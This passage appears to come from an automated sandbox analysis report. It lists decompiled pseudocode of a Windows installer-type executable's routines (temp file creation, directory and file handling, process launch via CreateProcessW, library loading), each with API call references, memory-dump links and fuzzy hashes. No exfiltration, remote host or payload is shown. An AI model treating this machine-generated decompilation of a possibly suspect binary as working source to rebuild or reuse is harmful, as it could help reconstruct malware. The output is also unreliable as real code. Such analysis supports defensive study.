                					E00406484();
                				}
                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                				return 0;
                			}















                0x00401c43
                0x00401c45
                0x00401c4c
                0x00401c4f
                0x00401c52
                0x00401c5c
                0x00401c60
                0x00401c63
                0x00401c6c
                0x00401c6c
                0x00401c6f
                0x00401c73
                0x00401c7c
                0x00401c7c
                0x00401c7f
                0x00401c83
                0x00401c85
                0x00401cda
                0x00401cdc
                0x00401ce7
                0x00401cf1
                0x00401cf4
                0x00401cf4
                0x00401cfd
                0x00000000
                0x00401c87
                0x00401c8e
                0x00401c90
                0x00401c93
                0x00401c99
                0x00401ca0
                0x00401ca3
                0x00401ccb
                0x00401d03
                0x00401d03
                0x00401ca5
                0x00401cb3
                0x00401cbb
                0x00401cbe
                0x00401cbe
                0x00401ca3
                0x00401d06
                0x00401d09
                0x00401d0f
                0x00402ba4
                0x00402ba4
                0x00402c2d
                0x00402c39

                APIs
                • SendMessageTimeoutW.USER32 ref: 00401CB3
                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Timeout
                • String ID: !
                • API String ID: 1777923405-2657877971
                • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                				intOrPtr _v8;
                				short _v12;
                				short _t12;
                				intOrPtr _t13;
                				signed int _t14;
                				WCHAR* _t17;
                				signed int _t19;
                				signed short _t23;
                				WCHAR* _t26;
                
                				_t26 = _a4;
                				_t23 = 0x64;
                				while(1) {
                					_t12 =  *L"nsa"; // 0x73006e
                					_t23 = _t23 - 1;
                					_v12 = _t12;
                					_t13 =  *0x40a57c; // 0x61
                					_v8 = _t13;
                					_t14 = GetTickCount();
                					_t19 = 0x1a;
                					_v8 = _v8 + _t14 % _t19;
                					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                					if(_t17 != 0) {
                						break;
                					}
                					if(_t23 != 0) {
                						continue;
                					} else {
                						 *_t26 =  *_t26 & _t23;
                					}
                					L4:
                					return _t17;
                				}
                				_t17 = _t26;
                				goto L4;
                			}












                0x00406062
                0x00406068
                0x00406069
                0x00406069
                0x0040606e
                0x0040606f
                0x00406072
                0x00406077
                0x0040607a
                0x00406084
                0x00406091
                0x00406095
                0x0040609d
                0x00000000
                0x00000000
                0x004060a1
                0x00000000
                0x004060a3
                0x004060a3
                0x004060a3
                0x004060a6
                0x004060a9
                0x004060a9
                0x004060ac
                0x00000000

                APIs
                • GetTickCount.KERNEL32 ref: 0040607A
                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CountFileNameTempTick
                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                • API String ID: 1716503409-1857211195
                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E004015C1(short __ebx, void* __eflags) {
                				void* _t17;
                				int _t23;
                				void* _t25;
                				signed char _t26;
                				short _t28;
                				short _t31;
                				short* _t34;
                				void* _t36;
                
                				_t28 = __ebx;
                				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                				_t17 = E00405EB7(_t16);
                				_t32 = _t17;
                				if(_t17 != __ebx) {
                					do {
                						_t34 = E00405E39(_t32, 0x5c);
                						_t31 =  *_t34;
                						 *_t34 = _t28;
                						if(_t31 != _t28) {
                							L5:
                							_t25 = E00405AEB( *(_t36 + 8));
                						} else {
                							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                								goto L5;
                							} else {
                								_t25 = E00405A6E( *(_t36 + 8));
                							}
                						}
                						if(_t25 != _t28) {
                							if(_t25 != 0xb7) {
                								L9:
                								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                							} else {
                								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                								if((_t26 & 0x00000010) == 0) {
                									goto L9;
                								}
                							}
                						}
                						 *_t34 = _t31;
                						_t32 = _t34 + 2;
                					} while (_t31 != _t28);
                				}
                				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                					_push(0xfffffff5);
                					E00401423();
                				} else {
                					E00401423(0xffffffe6);
                					E0040653D(L"C:\\Users\\engineer\\AppData\\Local\\Temp",  *(_t36 + 8));
                					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                					if(_t23 == 0) {
                						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                					}
                				}
                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                				return 0;
                			}











                0x004015c1
                0x004015c9
                0x004015cc
                0x004015d1
                0x004015d5
                0x004015d7
                0x004015df
                0x004015e1
                0x004015e4
                0x004015ea
                0x00401604
                0x00401607
                0x004015ec
                0x004015ec
                0x004015ef
                0x00000000
                0x004015fa
                0x004015fd
                0x004015fd
                0x004015ef
                0x0040160e
                0x00401615
                0x00401624
                0x00401624
                0x00401617
                0x0040161a
                0x00401622
                0x00000000
                0x00000000
                0x00401622
                0x00401615
                0x00401627
                0x0040162b
                0x0040162c
                0x004015d7
                0x00401634
                0x00401663
                0x004022f1
                0x00401636
                0x00401638
                0x00401645
                0x0040164d
                0x00401655
                0x0040165b
                0x0040165b
                0x00401655
                0x00402c2d
                0x00402c39

                APIs
                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,747DFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,747DFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                  • Part of subcall function 00405A6E: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                Strings
                • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 1892508949-1104044542
                • Opcode ID: 910828d5dc37494165d7f50429289ef459ba46965d2e72ee7da512ab8f93a7ae
                • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                • Opcode Fuzzy Hash: 910828d5dc37494165d7f50429289ef459ba46965d2e72ee7da512ab8f93a7ae
                • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 69%
                			E00401389(signed int _a4) {
                				intOrPtr* _t6;
                				void* _t8;
                				void* _t10;
                				signed int _t11;
                				void* _t12;
                				signed int _t16;
                				signed int _t17;
                				void* _t18;
                
                				_t17 = _a4;
                				while(_t17 >= 0) {
                					_t6 = _t17 * 0x1c +  *0x434f30;
                					if( *_t6 == 1) {
                						break;
                					}
                					_push(_t6); // executed
                					_t8 = E00401434(); // executed
                					if(_t8 == 0x7fffffff) {
                						return 0x7fffffff;
                					}
                					_t10 = E0040136D(_t8);
                					if(_t10 != 0) {
                						_t11 = _t10 - 1;
                						_t16 = _t17;
                						_t17 = _t11;
                						_t12 = _t11 - _t16;
                					} else {
                						_t12 = _t10 + 1;
                						_t17 = _t17 + 1;
                					}
                					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                						 *0x433eec =  *0x433eec + _t12;
                						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0);
                					}
                				}
                				return 0;
                			}











                0x0040138a
                0x004013fa
                0x0040139b
                0x004013a0
                0x00000000
                0x00000000
                0x004013a2
                0x004013a3
                0x004013ad
                0x00000000
                0x00401404
                0x004013b0
                0x004013b7
                0x004013bd
                0x004013be
                0x004013c0
                0x004013c2
                0x004013b9
                0x004013b9
                0x004013ba
                0x004013ba
                0x004013c9
                0x004013cb
                0x004013f4
                0x004013f4
                0x004013c9
                0x00000000

                APIs
                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$EnableShow
                • String ID:
                • API String ID: 1136574915-0
                • Opcode ID: 300667c7eaa95d67315d557d7665ac0848badbe8e60ad8e587faadf3b7ab87e2
                • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                • Opcode Fuzzy Hash: 300667c7eaa95d67315d557d7665ac0848badbe8e60ad8e587faadf3b7ab87e2
                • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405B20(WCHAR* _a4) {
                				struct _PROCESS_INFORMATION _v20;
                				int _t7;
                
                				0x430270->cb = 0x44;
                				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
                				if(_t7 != 0) {
                					CloseHandle(_v20.hThread);
                					return _v20.hProcess;
                				}
                				return _t7;
                			}





                0x00405b29
                0x00405b49
                0x00405b51
                0x00405b56
                0x00000000
                0x00405b5c
                0x00405b60

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CloseCreateHandleProcess
                • String ID:
                • API String ID: 3712363035-0
                • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                • Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
                • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                • Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040690A(signed int _a4) {
                				struct HINSTANCE__* _t5;
                				signed int _t10;
                
                				_t10 = _a4 << 3;
                				_t8 =  *(_t10 + 0x40a3e0);
                				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                				if(_t5 != 0) {
                					L2:
                					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                				}
                				_t5 = E0040689A(_t8); // executed
                				if(_t5 == 0) {
                					return 0;
                				}
                				goto L2;
                			}





                0x00406912
                0x00406915
                0x0040691c
                0x00406924
                0x00406930
                0x00000000
                0x00406937
                0x00406927
                0x0040692e
                0x00000000
                0x0040693f
                0x00000000

                APIs
                • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                  • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                  • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                  • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                • String ID:
                • API String ID: 2547128583-0
                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                				signed int _t5;
                				void* _t6;
                
                				_t5 = GetFileAttributesW(_a4); // executed
                				asm("sbb ecx, ecx");
                				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                				return _t6;
                			}





                0x00406031
                0x0040603e
                0x00406053
                0x00406059

                APIs
                • GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$AttributesCreate
                • String ID:
                • API String ID: 415043291-0
                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00406008(WCHAR* _a4) {
                				signed char _t3;
                				signed char _t7;
                
                				_t3 = GetFileAttributesW(_a4); // executed
                				_t7 = _t3;
                				if(_t7 != 0xffffffff) {
                					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                				}
                				return _t7;
                			}





                0x0040600d
                0x00406013
                0x00406018
                0x00406021
                0x00406021
                0x0040602a

                APIs
                • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405AEB(WCHAR* _a4) {
                				int _t2;
                
                				_t2 = CreateDirectoryW(_a4, 0); // executed
                				if(_t2 == 0) {
                					return GetLastError();
                				}
                				return 0;
                			}




                0x00405af1
                0x00405af9
                0x00000000
                0x00405aff
                0x00000000

                APIs
                • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                • GetLastError.KERNEL32 ref: 00405AFF
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CreateDirectoryErrorLast
                • String ID:
                • API String ID: 1375471231-0
                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004060DF(void* _a4, void* _a8, long _a12) {
                				int _t7;
                				long _t11;
                
                				_t11 = _a12;
                				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                				if(_t7 == 0 || _t11 != _a12) {
                					return 0;
                				} else {
                					return 1;
                				}
                			}





                0x004060e3
                0x004060f3
                0x004060fb
                0x00000000
                0x00406102
                0x00000000
                0x00406104

                APIs
                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU,000000FF,UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU,000000FF,000000FF,00000004,00000000), ref: 004060F3
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
